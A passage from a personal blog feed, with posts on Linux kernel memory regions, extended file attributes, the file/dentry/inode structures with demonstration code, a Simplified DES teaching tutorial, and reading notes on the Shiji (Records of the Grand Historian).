<li>pgd: base address of the first-level page table, the page global directory. When the kernel runs this process it loads pgd into the CR3 register and performs address translation from it.</li>
<li>mmlist: links all memory descriptors into a doubly linked list, whose first element is the mmlist field of init_mm.</li>
<li>mm_users: the number of lightweight processes sharing the mm_struct data structure.</li>
<li>mm_count: the primary usage counter of the memory descriptor; all the users counted in mm_users collectively count as just one unit in mm_count. Each time mm_count is decremented, the kernel checks whether it has become zero, and if so releases the memory descriptor, since no user is using it any more.</li>
</ul>
<p>mm_count counts references to the mm itself, while mm_users counts references to the mm's resources: two distinct levels. Roughly, mm_count counts per “process” while mm_users counts per “thread”. A kernel thread borrows another process's mm_struct while it runs; such threads are called “anonymous users” because they neither care about nor access the user space the mm_struct points to, only borrowing it temporarily, and mm_count records such threads. mm_users counts all processes sharing the user space that the mm_struct points to; that is, several processes may share one user address space.</p>
<h3>三. Memory regions</h3>
<p>Linux manages memory regions through objects of type vm_area_struct, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct vm_area_struct {
struct mm_struct * vm_mm; /* The address space we belong to. */
unsigned long vm_start; /* Our start address within vm_mm. */
unsigned long vm_end; /* The first byte after our end address within vm_mm. */
/* linked list of VM areas per task, sorted by address */
struct vm_area_struct *vm_next;
pgprot_t vm_page_prot; /* Access permissions of this VMA. */
unsigned long vm_flags; /* Flags, listed below. */
struct rb_node vm_rb;
union {
struct {
struct list_head list;
void *parent; /* aligns with prio_tree_node parent */
struct vm_area_struct *head;
} vm_set;
struct raw_prio_tree_node prio_tree_node;
} shared;
struct list_head anon_vma_node; /* Serialized by anon_vma->lock */
struct anon_vma *anon_vma; /* Serialized by page_table_lock */
/* Function pointers to deal with this struct. */
struct vm_operations_struct * vm_ops;
/* Information about our backing store: */
unsigned long vm_pgoff; /* Offset (within vm_file) in PAGE_SIZE
units, *not* PAGE_CACHE_SIZE */
struct file * vm_file; /* File we map to (can be NULL). */
void * vm_private_data; /* was vm_pte (shared mem) */
unsigned long vm_truncate_count;/* truncate_count or restart_addr */
};
</code></pre></div></div>
<p>Each region descriptor represents one linear address interval. The vm_start field holds the interval's first linear address and vm_end the first linear address beyond it, so vm_end minus vm_start is the region's length. vm_mm points to the mm_struct memory descriptor of the process that owns the interval.</p>
<p>A process's regions never overlap, and the kernel tries hard to merge a newly allocated region with adjacent existing ones: two neighboring regions can be merged if their access rights match. As shown in the figure below, when a new linear interval joins the process address space, the kernel checks whether an existing region can be enlarged (case a). If not, a new region is created (case b). Similarly, if a linear interval is removed from the address space, the kernel shrinks the affected region (case c); in some cases the shrinking forces a region to split into two smaller ones (case d).</p>
<p><img src="/assets/img/process_vm/1.jpg" alt="" /></p>
<p>All regions owned by a process are linked together in a simple list, ordered by ascending memory address, although adjacent regions may be separated by unused address gaps. The vm_next field of each vm_area_struct points to the next element of the list. The kernel finds regions through the descriptor's mmap field, which points to the first region descriptor on the list. The figure below shows the relationship between a process's address space, its memory descriptor, and the region list.</p>
<p><img src="/assets/img/process_vm/2.PNG" alt="" /></p>
<p>To speed up region lookup, Linux also uses a red-black tree. The two data structures hold pointers to the same region descriptors; when inserting or deleting a descriptor, the kernel searches the tree for the neighboring elements and uses the result to update the list quickly without scanning it. In general, the red-black tree is used to locate the region containing a given address, while the list is used when scanning the whole set of regions.</p>
<p>Let us dump the regions of an arbitrary process:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct task_struct *t = pid_task(find_get_pid(2576),PIDTYPE_PID);
struct mm_struct * mm = t->mm;
struct vm_area_struct* vma = mm->mmap;
int i;
for(i = 0;i < mm->map_count;++i)
{
printk("0x%lx-----0x%lx\n",vma->vm_start,vma->vm_end);
vma = vma->vm_next;
}
</code></pre></div></div>
<p>dmesg shows the result below.</p>
<p><img src="/assets/img/process_vm/4.PNG" alt="" /></p>
<p>This matches what the cat /proc/2576/maps command shows, with only a small difference in the stack area.</p>
<p><img src="/assets/img/process_vm/3.PNG" alt="" /></p>
Linux extended file attributes, and reading them from the kernel2014-10-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/09/linux-extend-attr
<p>Extended attributes (EAs) associate arbitrary metadata with a file's i-node in the form of name-value pairs. EAs can be used to implement access control lists and file capabilities, or to record a file's version number, information about its MIME type and character set, and so on: whatever you like, really.</p>
<p>An EA name has the form namespace.name, where the namespace partitions EAs into functionally distinct classes and the name uniquely identifies an EA within its namespace.</p>
<p>Linux defines four namespaces: user, trusted, system, and security.</p>
<ul>
<li>user EAs: manipulated by unprivileged processes, subject to file permission checks.</li>
<li>trusted EAs: can also be driven from user processes, like user EAs, except that the process must be privileged (CAP_SYS_ADMIN) to manipulate them.</li>
<li>system EAs: used by the kernel to associate system objects with a file; currently only access control lists are supported.</li>
<li>
<p>security EAs: serve two purposes: first, storing the file security labels used by operating-system security modules; second, associating capabilities with executable files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm@ubuntu:~$ touch filetest
kvm@ubuntu:~$ setfattr -n user.x -v "The past is not dead." filetest
kvm@ubuntu:~$ setfattr -n user.y -v "In fact,it's not even past." filetest
kvm@ubuntu:~$ getfattr -n user.x filetest
# file: filetest
user.x="The past is not dead."
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x="The past is not dead."
user.y="In fact,it's not even past."
kvm@ubuntu:~$ setfattr -n user.x filetest # set the EA's value to an empty string
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x
user.y="In fact,it's not even past."
kvm@ubuntu:~$ setfattr -x user.y filetest # remove an EA
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x
</code></pre></div> </div>
</li>
</ul>
<p>I will not go into the user-level functions; below is a quick look at fetching a file's EA from inside the kernel. The small test snippet mainly works through the getxattr operation of the inode structure, after first obtaining the dentry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int hello_init()
{
struct file *f;
struct inode *node;
struct dentry *dent;
int rc;
char in[100];
printk(KERN_ALERT "Hello, world\n");
printk(KERN_ALERT "name:%s\n",current->comm);
f = filp_open("/home/kvm/tfile",O_RDONLY,0);
dent = f->f_path.dentry;
node = dent->d_inode;
if (node->i_op->getxattr == NULL)
{
printk("inode's getxattr is null!\n");
return 0;
}
rc = node->i_op->getxattr(dent, "user.x", in, 100);
if (rc < 0)
return 0;
printk("the user.x is:%s\n",in);
return 0;
}
</code></pre></div></div>
<p>The output is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>the user.x is:The past is not dead.
</code></pre></div></div>
Getting the file pathname from an inode structure in the Linux kernel2014-08-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/08/31/get-the-full-pathname-from-inode
<p>A recent requirement: obtain the full pathname from a file's inode. A good excuse to summarize the file, path, dentry, and inode structures in Linux.</p>
<ul>
<li><a href="#第一节">Overview</a></li>
<li><a href="#第二节">The structures</a></li>
<li><a href="#第三节">Getting the absolute path from an inode</a></li>
</ul>
<h3 id="第一节">1. Overview</h3>
<p>The most important parts of an operating system are process management and the file system.</p>
<p>Linux originally adopted the minix file system. minix, developed by Andrew S. Tanenbaum as an experimental operating system, has certain limitations. After a period of improvement and development, Linux produced the ext2 file system, which of course later grew into ext3 and ext4. To support many different file systems, Linux uses the so-called Virtual Filesystem Switch (VFS). The VFS provides a set of standard, abstract file operations exposed to user programs as system calls such as read(), write(), and lseek(). User programs can thus treat all files as uniform, abstract “VFS files” and operate on them through these system calls, without caring which file system a file belongs to or how that file system is designed and implemented. Figure 1 shows the relationship between the VFS and concrete file systems.</p>
<p><img src="/assets/img/inode/1.PNG" alt="" /></p>
<h3 id="第二节">2. The structures</h3>
<p>Different file systems implement their functionality with different code, but the interface to the VFS is clearly defined. The core of that interface is the file_operations data structure, defined in include/linux/fs.h:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct file_operations {
struct module *owner;
loff_t (*llseek) (struct file *, loff_t, int);
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
int (*readdir) (struct file *, void *, filldir_t);
unsigned int (*poll) (struct file *, struct poll_table_struct *);
long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
int (*mmap) (struct file *, struct vm_area_struct *);
int (*open) (struct inode *, struct file *);
int (*flush) (struct file *, fl_owner_t id);
int (*release) (struct inode *, struct file *);
int (*fsync) (struct file *, loff_t, loff_t, int datasync);
int (*aio_fsync) (struct kiocb *, int datasync);
int (*fasync) (int, struct file *, int);
int (*lock) (struct file *, int, struct file_lock *);
ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
int (*check_flags)(int);
int (*flock) (struct file *, int, struct file_lock *);
ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
int (*setlease)(struct file *, long, struct file_lock **);
long (*fallocate)(struct file *file, int mode, loff_t offset,
loff_t len);
};
</code></pre></div></div>
<p>Each file system has its own file_operations structure. Its members are almost all function pointers, so it is effectively a jump table; read, for example, points to the entry function the concrete file system uses to implement reading a file.</p>
<p>A process connects to a concrete file through open(); the connection is represented by a file data structure, which holds a file_operations pointer f_op. Setting f_op in the file structure to point at a particular file_operations structure designates the file system the file belongs to.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct files_struct {
/*
* read mostly part
*/
atomic_t count;
struct fdtable __rcu *fdt;
struct fdtable fdtab;
/*
* written part on a separate cache line in SMP
*/
spinlock_t file_lock ____cacheline_aligned_in_smp;
int next_fd;
struct embedded_fd_set close_on_exec_init;
struct embedded_fd_set open_fds_init;
struct file __rcu * fd_array[NR_OPEN_DEFAULT];
};
</code></pre></div></div>
<p>进程的task_struct中有一个类型为struct files_struct的files域,记录了该进程已打开的文件信息。files_struct的主体就是一个file结构指针数组。每打开一个文件以后,进程就通过一个“打开文件号”fd来访问这个文件,而fd实际上就是相应file结构指针在数组中的下标。file结构中还有一个指针f_dentry,指向该文件的dentry数据结构。每一个文件只有一个dentry结构,而可能有多个进程打开它。</p>
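<p>可以在用户态做个小实验来印证这一点:同一个进程两次open同一个文件,内核中会对应两个独立的file结构,各自维护自己的偏移量。下面是一段Python示意代码(非内核代码,文件路径是临时生成的):</p>

```python
import os, tempfile

# 创建一个临时文件并写入内容
path = os.path.join(tempfile.mkdtemp(), "demo.txt")
with open(path, "w") as f:
    f.write("hello vfs")

# 同一进程两次打开同一个文件:内核中对应两个独立的 file 结构
fd1 = os.open(path, os.O_RDONLY)
fd2 = os.open(path, os.O_RDONLY)

os.read(fd1, 5)                          # 只推进 fd1 的偏移
off1 = os.lseek(fd1, 0, os.SEEK_CUR)     # 5
off2 = os.lseek(fd2, 0, os.SEEK_CUR)     # 0:fd2 的 file 结构有自己的偏移
print(off1, off2)

os.close(fd1)
os.close(fd2)
```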
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dentry {
/* RCU lookup touched fields */
unsigned int d_flags; /* protected by d_lock */
seqcount_t d_seq; /* per dentry seqlock */
struct hlist_bl_node d_hash; /* lookup hash list */
struct dentry *d_parent; /* parent directory */
struct qstr d_name;
struct inode *d_inode; /* Where the name belongs to - NULL is
* negative */
unsigned char d_iname[DNAME_INLINE_LEN]; /* small names */
/* Ref lookup also touches following */
unsigned int d_count; /* protected by d_lock */
spinlock_t d_lock; /* per dentry lock */
const struct dentry_operations *d_op;
struct super_block *d_sb; /* The root of the dentry tree */
unsigned long d_time; /* used by d_revalidate */
void *d_fsdata; /* fs-specific data */
struct list_head d_lru; /* LRU list */
/*
* d_child and d_rcu can share memory
*/
union {
struct list_head d_child; /* child of parent list */
struct rcu_head d_rcu;
} d_u;
struct list_head d_subdirs; /* our children */
struct list_head d_alias; /* inode alias list */
};
</code></pre></div></div>
<p>dentry结构中有一个指向inode的指针。dentry与inode结构所描述的目标是不一样的,因为一个文件可能对应多个文件名(链接)。所以dentry结构代表的是逻辑意义上的文件,记录的是其逻辑上的属性。而inode结构所代表的是物理意义上的文件,记录的是其物理上的属性;它们之间的关系是多对一的关系。这是因为一个已经建立的文件可以被连接 (link) 到其他文件名。dentry中还有个d_parent指向父目录的dentry结构。</p>
<p>inode数据结构比较大,就不列出来了。要注意的是inode结构中有一个i_dentry是所有与这个inode关联的dentry。凡是代表着这个文件的所有目录项都通过其dentry结构中的d_alias挂入相应inode结构中的 i_dentry 队列。</p>
<p>下面是需要注意的几点:</p>
<ol>
<li>进程每打开一个文件,就会有一个file结构与之对应。同一个进程可以多次打开同一个文件而得到多个不同的file结构,file结构描述被打开文件的属性,如文件的当前偏移量等信息。</li>
<li>两个不同的file结构可以对应同一个dentry结构。进程多次打开同一个文件时,对应的只有一个dentry结构。dentry结构存储目录项和对应文件(inode)的信息。</li>
<li>在存储介质中,每个文件对应唯一的inode结点,但是每个文件又可以有多个文件名。即可以通过不同的文件名访问同一个文件。这里多个文件名对应一个文件的关系在数据结构中表示就是dentry和inode的关系。</li>
<li>inode中不存储文件的名字,它只存储节点号;而dentry则保存有名字和与其对应的节点号,所以就可以通过不同的dentry访问同一个inode。</li>
<li>多个dentry指向同一个inode,是通过为同一个文件建立硬链接(ln命令)来实现的。</li>
</ol>
<p>因此关系就是:进程->task_struct->files_struct->file->dentry->inode->Data Area</p>
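<p>第3、4、5点可以在用户态直接观察:用link系统调用(ln命令的底层)为同一个文件建立第二个名字后,两个名字stat出来的inode号相同,链接计数变为2。下面是一段Python示意:</p>

```python
import os, tempfile

d = tempfile.mkdtemp()
src = os.path.join(d, "a.txt")
lnk = os.path.join(d, "b.txt")
with open(src, "w") as f:
    f.write("data")

os.link(src, lnk)             # ln:为同一个文件再建一个目录项(dentry)
st1, st2 = os.stat(src), os.stat(lnk)

print(st1.st_ino == st2.st_ino)   # True:两个名字对应同一个 inode
print(st1.st_nlink)               # 2:inode 的链接计数变为 2
```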
<h3 id="第三节">3.从inode得到文件绝对路径</h3>
<p>有了上面的基础,从inode得到文件名就比较简单了,这里我假设文件只有一个路径,如果有很多路径改改就行了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>char *getfullpath(struct inode *inod,char* buffer,int len)
{
struct list_head* plist = NULL;
struct dentry* tmp = NULL;
struct dentry* dent = NULL;
struct dentry* parent = NULL;
char* name = NULL;
char* pbuf = buffer + PATH_MAX - 1;
struct inode* pinode = inod;
int length = 0;
buffer[PATH_MAX - 1] = '\0';
if(pinode == NULL)
return NULL;
list_for_each(plist,&pinode->i_dentry)
{
tmp = list_entry(plist,struct dentry,d_alias);
if(tmp->d_inode == pinode)
{
dent = tmp;
break;
}
}
if(dent == NULL)
{
return NULL;
}
name = (char*)(dent->d_name.name);
/* 文件名不足4个字符时直接返回,避免下面的指针运算越界 */
if(strlen(name) &lt; 4)
return NULL;
name = name + strlen(name) - 4;
if(!strcmp(name,".img"))
{
while(pinode && pinode ->i_ino != 2 && pinode->i_ino != 1)
{
if(dent == NULL)
break;
name = (char*)(dent->d_name.name);
if(!name)
break;
pbuf = pbuf - strlen(name) - 1;
*pbuf = '/';
memcpy(pbuf+1,name,strlen(name));
length += strlen(name) + 1;
if((parent = dent->d_parent))
{
if(parent == dent) /* 已到达根目录(根dentry的d_parent指向自身),防止死循环 */
break;
dent = parent;
pinode = dent->d_inode;
}
}
printk(KERN_INFO "the fullname is :%s \n",pbuf);
}
return pbuf;
}
</code></pre></div></div>
《史记·殷本纪第三》笔记2014-04-21T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/21/yinbenji
<p>史记的这篇能记的不多,是讲殷商的历史的。</p>
<p>首先说说伊尹这个人。相传伊尹为了结识汤,作为有莘氏的媵臣(也就是陪嫁奴隶)来到汤身边,借着给汤做饭的机会向汤讲述为王之道,分析天下大势。于是汤封他做了宰相。据传伊尹也是一代名厨,由厨师到宰相,这跨度还是有点大,这充分说明别拿厨师不当人才。</p>
<p>伊尹历事商朝汤、外丙、仲壬、太甲、沃丁五代帝王,为商朝立下汗马功劳。这种权臣一般都容易出问题,还好伊尹是个好人。太甲即位时,暴虐,不遵汤法,乱德。于是伊尹将其流放到了桐宫。三年之后,太甲改过自新,伊尹再次迎回太甲,帝太甲也成了一个好君主。</p>
<p>《殷本纪》其实记录得比较流水,大概就是x崩,y立。y崩,z立。这种格式,只有对最后一位昏君商纣介绍得比较详细。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>帝纣资辨捷疾,闻见甚敏;材力过人,手格猛兽;知足以距谏,言足以饰非;矜人臣以能,高天下以声,以为皆出己之下。
</code></pre></div></div>
<p>上面是太史公对纣的描写。单从前四句看确实是奇才,有这种资质,加上生在帝王之家,确实很容易骄傲自大,“以为皆出己之下”,这是有多狂妄。纣真的是各种荒淫无道。九侯的女儿因为不喜欢这种荒淫,竟然连累父亲被杀,鄂侯因为争辩也被杀,西伯昌因为悄悄叹了一口气就被囚禁。还好昌的手下进献各种宝物才让西伯免于一死。而之后才有了文王兴周、武王伐纣的历史。</p>
<p>我从小遇到的聪明人不少,而正如吕老师所说,如果聪明没有办法转换成智慧,那就什么都不是。我觉得聪明的人第一点就是千万不要自大,不管是家境,智力都不应该是傲慢的资本,更不用那些技术了。不知道那些聪明的家伙现在都怎么样了。</p>
《史记·夏本纪第二》笔记2014-04-20T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/20/xiabenji
<p>这篇读完也就结束了尧舜禹禅让的时代,进入了皇权世袭制的时代。这里记录下关于禅让与世袭的一些思考。</p>
<p>读过《五帝本纪》的人都知道,其实五帝都是一个家族的,都是黄帝的后代,但是后代为什么把这个世袭的罪责归到了禹身上。大概是因为黄帝传了后代之后,出现了尧舜禹禅让(虽然是一家人,其实关系已经很远了),而禹传启之后再也没有过禅让了,世袭成为大家所公认的制度。</p>
<p>尧死后,舜也曾经让过帝位给尧的儿子丹朱,但是当时的人们都知道舜的贤能,而不去朝见丹朱(估计丹朱也知道自己没戏),舜就自然当上了皇帝。</p>
<p>同样的情况出现在禹跟舜的儿子商均身上,禹也只是象征性地让了一下,天下人还是去朝见禹,然后禹也当上了皇帝。</p>
<p>禹选择继承人的时候本身也没有想过自己的儿子,他先选的是皋陶,是禹时代的一个贤臣。但是不幸的是,皋陶死了。接着又选了益来掌管国家大事,但是益辅佐禹的时间并不长,并没有得到天下人的认同。益也一样,他让位给禹的儿子启,而恰恰是这个启,又是一个十分贤能的人,大家就都认他,而不认益了。</p>
<p>“禹传子,家天下”的说法就来了。</p>
<p>我们回过头来看看这个禅让制,它的思想是通过在位的君主来挑选那些贤能继承自己的帝位,人本身不可能没有私心。尧舜禹可以说是做到了没有私心,但是这维持了多久呢。这再一次说明了制度的重要胜于人事。后人只需要按照制定的制度做就行,而谁能保证君主始终是一个贤君呢。</p>
<p>一个身处权力顶峰的人很容易受到人民的狂热崇拜,以至于犯下错误而不自知。我第一次读到“皋陶于是敬禹之德,令民皆则禹。不如言,刑从之。”这句话的时候还是震惊了一下的:不顺从他说的,就要受刑罚,这不是一个黑暗的社会吗?美国在罗斯福之前总统不超过两届的惯例,是大家效仿开国之父华盛顿两届离职的先例;罗斯福因为经济危机和二战连任四届总统,似乎也无可厚非。然而美国在战后还是通过修宪,制定了总统任期不能超过两届的修正案。</p>
<p>这是一种对制度的信任。</p>
Simplified DES简介2014-04-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/17/SDES
<!--script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"-->
<!-- mathjax config similar to math.stackexchange -->
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML" type="text/javascript"></script>
<p>Simplified DES是由Edward Schaefer教授开发的用于教学的简单加密算法,它与DES有着相似的属性与结构,只是参数比较小而已。通过这种简单的、能够手工完成加解密的算法,能让我们加深对DES的理解。</p>
<h3>概述</h3>
<p>图1是simplified DES(下称S-DES)的总体结构图。S-DES加密算法使用8位明文(如10111101)和10位密钥作为输入,产生8位密文。相反地,S-DES解密算法使用8位密文和相同的10位密钥作为输入,产生8位明文。</p>
<p><img src="/assets/img/sdes/1.png" alt="" /></p>
<p>加密算法包括5个函数:初始的置换函数(\(IP{}^{}\));一个复杂的函数\(f{}_{k}\),这个函数包括取决于输入的置换和替换操作;一个简单的置换函数\(SW\),用于置换输入数据的前后2个部分;然后又是\(f{}_{k}\);最后是初始置换函数的逆(\(IP{}^{-1}\))。</p>
<p>\(f{}_{k}\)的输入包括明文和8位密钥,我们可以使用16位的密钥,每一轮使用8位(共两轮\(f{}_{k}\)),也可以使用8位密钥,每一次都使用相同的密钥。作为折中,我们使用了10位密钥,每一次的\(f{}_{k}\)通过移位产生8位密钥。两个密钥的产生如图2:</p>
<p><img src="/assets/img/sdes/2.png" alt="" /></p>
<p>这个算法中,密钥首先通过一个置换函数(\(P10\))。然后左移一位,输出通过一个置换函数(\(P8\)),产生第一个密钥\(K_{1}\)。左移一位之后的结果再进行移位和置换(\(P8\)),产生第二个密钥\(K_{2}\)。</p>
<p>我们将S-DES的加密算法使用函数组合表达如下:</p>
\[IP^{-1}\circ f_{K_{2}}\circ SW\circ f_{K_{1}}\circ IP\]
<p>也就是</p>
\[ciphertext = IP^{-1}(f_{K_{2}}(SW(f_{K_{1}}(IP(plaintext)))))\]
<p>其中</p>
\[K_{1} = P8(Shift(P10(key)))
K_{2} = P8(Shift(Shift(P10(key))))\]
<p>解密算法也在图1中,可以表示成加密算法的逆运算。</p>
\[plaintext = IP^{-1}(f_{K_{1}}(SW(f_{K_{2}}(IP(ciphertext)))))\]
<h3>S-DES密钥生成</h3>
<p>图2显示了子密钥的生成。</p>
<p>首先,按照一定方式对输入密钥进行置换。如输入的10位密钥是\((k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10})\)。 \(P10\)如下定义:</p>
\[P10(k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10}) = (k_{3},k_{5},k_{2},k_{7},k_{4},k_{10},k_{1},k_{9},k_{8},k_{6})\]
<p>P10可以简单表示如下:</p>
<p><img src="/assets/img/sdes/3.png" alt="" /></p>
<p>这个表的意思就是说第一个输出是输入的第3位,第二个输出是输入的第5位,以此类推。如,密钥1010000010被置换成1000001100。</p>
<p>接下来进行循环左移一位(LS-1),是将密钥分成左右两部分(每部分5位),左右各循环左移一位。这个例子中,得到00001 11000.</p>
<p>接着执行\(P8\),从10位输出中选出8位密钥,P8定义如下:</p>
<p><img src="/assets/img/sdes/4.png" alt="" /></p>
<p>结果就是第一个子密钥(\(K_{1}\)),在我们这个例子中,是10100100。</p>
<p>然后对第一次循环左移产生的那对5位数据(00001 11000)再循环左移两位。这个例子中的结果是00100 00011。最后,将结果通过\(P8\),产生\(K_{2}\)。这个例子中是01000011。</p>
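<p>上述子密钥生成过程可以直接写成代码验证。下面是一段Python示意(P10、P8即正文给出的置换表),用正文的例子1010000010检验,得到的K1、K2与正文一致:</p>

```python
# S-DES 子密钥生成的 Python 示意(置换表取自正文)
P10 = [3, 5, 2, 7, 4, 10, 1, 9, 8, 6]
P8  = [6, 3, 7, 4, 8, 5, 10, 9]

def permute(bits, table):
    # 置换表中的下标从 1 开始
    return [bits[i - 1] for i in table]

def rotl(half, n):
    # 对 5 位的一半做循环左移 n 位
    return half[n:] + half[:n]

def keygen(key10):
    bits = [int(b) for b in key10]
    t = permute(bits, P10)
    left, right = rotl(t[:5], 1), rotl(t[5:], 1)   # LS-1
    k1 = permute(left + right, P8)
    left, right = rotl(left, 2), rotl(right, 2)    # LS-2
    k2 = permute(left + right, P8)
    return ''.join(map(str, k1)), ''.join(map(str, k2))

k1, k2 = keygen("1010000010")
print(k1, k2)   # 10100100 01000011,与正文例子一致
```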
<h3>S-DES加密</h3>
<p>图3展示了S-DES加密算法的细节。这部分详细介绍加密流程中的5个函数。</p>
<p><img src="/assets/img/sdes/5.png" alt="" /></p>
<p>初始和结尾的置换函数:</p>
<p>对于输入的8位明文,我们需要使用\(IP\)对其进行重新置换:</p>
<p><img src="/assets/img/sdes/6.png" alt="" /></p>
<p>在算法末尾,需要进行相反的操作:</p>
<p><img src="/assets/img/sdes/7.png" alt="" /></p>
<p>可以验证\(IP^{-1}(IP(X)) = X\)。</p>
<p>\(f_{K}\)函数:</p>
<p>S-DES中最复杂的部分就是函数\(f_{K}\)了,这个函数包含了置换的和替换的组合。这个函数解释如下。首先让L和R分别表示\(f_{K}\)8位输入的左边4位和右边4位,F是一个4位到4位的映射。则</p>
\[f_{K}(L,R) = (L\oplus F(R,SK),R)\]
<p>SK是一个子密钥。</p>
<p>下面解释F。它的输入是4位数\((n_{1} n_{2} n_{3} n_{4})\),第一个操作是扩展与置换:</p>
<p><img src="/assets/img/sdes/8.png" alt="" /></p>
<p>为了方便起见,写成如下形式:</p>
<p><img src="/assets/img/sdes/9.png" alt="" /></p>
<p>将8位的子密钥\(K_{1} = (k_{11},k_{12},k_{13},k_{14},k_{15},k_{16},k_{17},k_{18})\)与上面的数进行异或:</p>
<p><img src="/assets/img/sdes/10.png" alt="" /></p>
<p>重新命名这8个数:</p>
<p><img src="/assets/img/sdes/11.png" alt="" /></p>
<p>前面4位用于在第一个S盒产生一个2位输出,后面4位在第二个S盒产生一个2位输出,两个S盒定义如下:</p>
<p><img src="/assets/img/sdes/12.png" alt="" /></p>
<p>S盒操作如下:第一个和第四个输入位组成一个2位数,指定S盒中的行;第二和第三个输入位组成一个2位数,指定S盒中的列。比如\((p_{0,0}p_{0,3})=(00)\)和\((p_{0,1}p_{0,2})=(10)\),则输出是S0盒第0行第2列的元素,这里是3(二进制的11)。类似地,用\((p_{1,0}p_{1,3})\)和\((p_{1,1}p_{1,2})\)在第二个S盒中查出另外2位输出。</p>
<p>接着,由两个S盒产生的4位值通过一个置换函数\(P4\):</p>
<p>\(P4\)的输出就是F的输出。</p>
<p>SW函数:</p>
<p>\(f_{K}\)函数仅仅改变输入的左边4位,SW函数将左右两部分互换,这样第二轮的\(f_{K}\)处理的就是原来右边的4位。第二轮的\(f_{K}\)中,E/P、S0、S1和P4都跟第一轮一样,只有子密钥变成了\(K_{2}\)。</p>
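<p>整个加解密流程也可以用几十行Python验证。需要说明的是,正文中的E/P、P4、IP等表以图片给出,下面代码中的置换表和S0、S1取自Schaefer原始定义(属于这里的假设);可以验证先加密再解密能还原明文:</p>

```python
# S-DES 轮函数与整体加解密的 Python 示意。
# EP、P4、IP、S0、S1 按 Schaefer 原始定义写死(正文以图片给出,这里是假设)。
EP  = [4, 1, 2, 3, 2, 3, 4, 1]
P4  = [2, 4, 3, 1]
IP  = [2, 6, 3, 1, 4, 8, 5, 7]
IPi = [4, 1, 3, 5, 7, 2, 8, 6]
S0 = [[1,0,3,2],[3,2,1,0],[0,2,1,3],[3,1,3,2]]
S1 = [[0,1,2,3],[2,0,1,3],[3,0,1,0],[2,1,0,3]]

def permute(bits, table):
    return [bits[i - 1] for i in table]

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def sbox(box, bits):
    row = bits[0] * 2 + bits[3]      # 第1、4位选行
    col = bits[1] * 2 + bits[2]      # 第2、3位选列
    v = box[row][col]
    return [v >> 1 & 1, v & 1]

def F(r, sk):
    t = xor(permute(r, EP), sk)      # 扩展置换后与子密钥异或
    return permute(sbox(S0, t[:4]) + sbox(S1, t[4:]), P4)

def fk(bits, sk):
    l, r = bits[:4], bits[4:]
    return xor(l, F(r, sk)) + r      # 只改变左边4位

def sw(bits):
    return bits[4:] + bits[:4]

def encrypt(p, k1, k2):
    return permute(fk(sw(fk(permute(p, IP), k1)), k2), IPi)

def decrypt(c, k1, k2):
    return permute(fk(sw(fk(permute(c, IP), k2)), k1), IPi)

# 用正文例子中由密钥1010000010得到的 K1、K2 验证加解密互逆
K1 = [1,0,1,0,0,1,0,0]
K2 = [0,1,0,0,0,0,1,1]
p  = [1,0,1,1,1,1,0,1]
c  = encrypt(p, K1, K2)
print(decrypt(c, K1, K2) == p)   # True
```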
<p>在网上找到了一个S-DES的例子,希望大家能自己走一遍流程。</p>
<p><a href="/assets/file/mimaxue/SDES.pdf">S-DES</a></p>
《史记·五帝本纪第一》笔记2014-04-15T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/15/wudibenji
<p>最近因为在Coursera上面跟台大吕世浩老师的《史记》,自己准备重新认真学习一下史记。在这里做些笔记。</p>
<p>《史记》是我在高中的时候看的,当时关注的是优美的文字与故事情节,现在听了吕世浩老师的课,觉得很有必要重新看一遍,
然后自己买了三家注的《史记》,繁体竖版,质量好,很值得收藏啊。</p>
<p>上周周末把《史记》第一篇《五帝本纪第一》看完了,在这里做个总结。</p>
<p>首先五帝的关系如下图所示:</p>
<p><img src="/assets/img/wudibenji/1.PNG" alt="" /></p>
<p>图中红色字体表示的就是五帝。</p>
<p>黄帝:不用多说了,所谓的炎黄子孙中的黄就是他。黄帝通过阪泉之战战胜了炎帝,通过逐鹿之战战胜了蚩尤,得有天下。</p>
<p>高阳:就是颛顼了。</p>
<p>高辛:就是帝喾。</p>
